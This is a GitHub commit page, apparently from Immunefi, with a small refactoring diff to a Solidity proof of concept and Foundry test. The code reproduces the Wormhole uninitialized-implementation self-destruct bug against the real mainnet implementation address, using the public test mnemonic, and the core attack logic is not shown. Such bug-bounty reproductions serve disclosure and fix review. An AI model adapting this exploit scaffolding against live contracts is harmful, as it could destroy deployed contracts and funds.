WormholePoC review

immunefi-team · Jan 19, 2024 · 5ce270d · 5ce270d
1 parent d7d4c9c
commit 5ce270d
Show file tree

Hide file tree

Showing 2 changed files with 13 additions and 7 deletions.
diff --git a/src/Wormhole/WormholeBugFixReview.sol b/src/Wormhole/WormholeBugFixReview.sol
@@ -4,6 +4,7 @@ pragma solidity ^0.8.0;
 import "@immunefi/PoC.sol";
 
 address constant wormholeImpl= 0x736D2A394f7810C17b3c6fEd017d5BC7D60c077d;
+string constant mnemonic = "test test test test test test test test test test test junk";
 
 interface IImplementation{
     struct GuardianSet {
@@ -30,7 +31,7 @@ contract WormholeBugFixReview is PoC {
     address wormholeImplAddr;
 
     address internal attacker;
-    uint256 attackerPrivateKey;
+
 
     function initializeAttack() public {
         console.log("\n>>> Initialize attack");
@@ -39,8 +40,8 @@ contract WormholeBugFixReview is PoC {
         //Convert bytes32 to address:
         wormholeImplAddr = address(uint160(uint256(implementation)));
         console.log("Is a contract?", isContract(wormholeImpl));
-        string memory mnemonic = "test test test test test test test test test test test junk";
-        attackerPrivateKey = vm.deriveKey(mnemonic, 0);
+
+        uint256 attackerPrivateKey = vm.deriveKey(mnemonic, 0);
         attacker = vm.addr(attackerPrivateKey);
         console.log("Attacker address: ", attacker);
 

diff --git a/test/Wormhole/WormholeBugFix.t.sol b/test/Wormhole/WormholeBugFix.t.sol
@@ -22,15 +22,20 @@ contract WormholeBugFixTest is Test {
         console.log("Implementation address:");
         console.log(a_implementation);
         console.log("Is Initialized?");
-        console.log(IImplementation(0x736D2A394f7810C17b3c6fEd017d5BC7D60c077d).isInitialized(a_implementation));
-        console.log(IImplementation(0x736D2A394f7810C17b3c6fEd017d5BC7D60c077d).getCurrentGuardianSetIndex());
-        address[] memory guardSet = IImplementation(0x736D2A394f7810C17b3c6fEd017d5BC7D60c077d).getGuardianSet(0).keys;
+
+        IImplementation target = IImplementation(0x736D2A394f7810C17b3c6fEd017d5BC7D60c077d);
+        console.log(target.isInitialized(a_implementation));
+        console.log(target.getCurrentGuardianSetIndex());
+        address[] memory guardSet = target.getGuardianSet(0).keys;        
+
         console.log("Guardian: ", guardSet[0]);
 
-        wormholeBugFix = new WormholeBugFixReview();
+        wormholeBugFix = new WormholeBugFixReview(); 
         wormholeBugFix.initializeAttack();
     }
 
+    //Due to limitations of foundry, self destruct opcode doesn't take effect until a call is over, 
+    //so the attack must be executed in the setup and then verified it was executed successfully in the test file.
     function testSelfDestruct() public {
         console.log("Is a contract?", isContract(0x736D2A394f7810C17b3c6fEd017d5BC7D60c077d));
         console.log("End");